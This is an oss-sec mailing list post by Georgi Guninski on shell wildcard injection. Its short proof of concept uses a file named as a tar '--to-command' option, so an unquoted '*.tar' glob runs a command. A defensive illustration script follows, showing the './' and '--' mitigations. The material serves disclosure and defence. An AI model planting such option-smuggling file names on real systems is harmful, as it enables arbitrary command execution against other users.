oss-sec mailing list archives
Shell wildcards considered dangerous?
From: Georgi Guninski <gguninski () gmail com>
Date: Mon, 9 Dec 2019 15:23:16 +0200
Remote version of this affects wu-ftpd from 2003:
https://www.debian.org/security/2003/dsa-377

Summary: For trusted command PROGRAM, executing PROGRAM *.EXT may lead to
arbitrary code execution, e.g. for PROGRAM=EXT=tar

The main idea is the wildcard to add program options.

Open problem: Are popular programs other than tar vulnerable?

Since shell wildcards are unlikely to change, should best practice include
not using *.EXT in shell?

Example exploit vector: starting program in untrusted directories.

Poc:
====
$ rm -rf /tmp/1 ;mkdir /tmp/1 ; cd /tmp/1 ; tar cf a.tar /etc/issue
$ : > --to-command="yes .tar"
#end creating, starts PoC
tar xf *.tar
#.tar (repeats)
====

--
CV: https://j.ludost.net/resumegg.pdf
site: http://www.guninski.com
blog: https://j.ludost.net/blog
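As an added illustration, not part of Guninski's post, the script below models the option-versus-operand split that getopt-style programs perform and shows what an unquoted `*.EXT` glob hands such a program from a directory containing a dash-prefixed file name, against the two usual defences: a `./` prefix on the pattern (works for any program, since no expansion can start with `-`) and a `--` terminator (works only for programs that honour it, placed after the real options). The scratch directory, the placeholder name `--bogus-option.tar` and every function name are constructed for this example.

```shell
#!/bin/sh
# Added example (not from the original post). Models argv parsing, then
# feeds it the expansion of a glob from a directory with a dash-prefixed file.
set -e

# Constructed input: a scratch directory with an ordinary archive name and a
# file whose name begins with "--" (placeholder, not a real option of any
# program). Prints the directory path.
make_scratch() {
  d=$(mktemp -d) || return 1
  : > "$d/a.tar"
  : > "$d/--bogus-option.tar"
  printf '%s\n' "$d"
}

# Minimal model of getopt-style parsing (tar, rm, chown, most CLI tools):
# before "--", a word starting with "-" is an option; after "--", every word
# is an operand. Prints the number of operands the program would act on.
count_operands() {
  n=0 after_dashdash=0
  for a in "$@"; do
    if [ "$after_dashdash" -eq 1 ]; then n=$((n + 1)); continue; fi
    case $a in
      --) after_dashdash=1 ;;
      -*) ;;                 # swallowed as an option: the bug in the post
      *)  n=$((n + 1)) ;;
    esac
  done
  echo "$n"
}

# Expands PATTERN ($2) inside DIR ($1) exactly as "PROGRAM PATTERN" would
# (unquoted on purpose), optionally preceded by "--" ($3 = 1), and reports
# how many of the resulting words survive as operands.
operands_for() {
  (
    cd "$1" || exit 1
    if [ "${3:-0}" -eq 1 ]; then count_operands -- $2; else count_operands $2; fi
  )
}

# Audit helper: lists entries in DIR whose names begin with "-", the shape
# this bug class depends on (useful for upload or shared directories). The
# "./" prefix keeps the loop itself from tripping over such names.
list_dash_names() {
  (
    cd "$1" || exit 1
    for f in ./-*; do
      if [ -e "$f" ]; then printf '%s\n' "${f#./}"; fi
    done
  )
}
```

With the scratch directory, `*.tar` yields one operand (the dash-prefixed file is consumed as an option), while `-- *.tar` and `./*.tar` both yield two.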
Current thread:
- Shell wildcards considered dangerous? Georgi Guninski (Dec 09)
- Re: Shell wildcards considered dangerous? Noel Kuntze (Dec 09)
- Re: Shell wildcards considered dangerous? Leonid Isaev (Dec 09)
- Re: Shell wildcards considered dangerous? Noel Kuntze (Dec 09)
- Re: Shell wildcards considered dangerous? Leonid Isaev (Dec 09)
- Re: Shell wildcards considered dangerous? Noel Kuntze (Dec 09)
- Re: Shell wildcards considered dangerous? Leonid Isaev (Dec 09)
- Re: Shell wildcards considered dangerous? Leonid Isaev (Dec 09)
- Re: Shell wildcards considered dangerous? Noel Kuntze (Dec 09)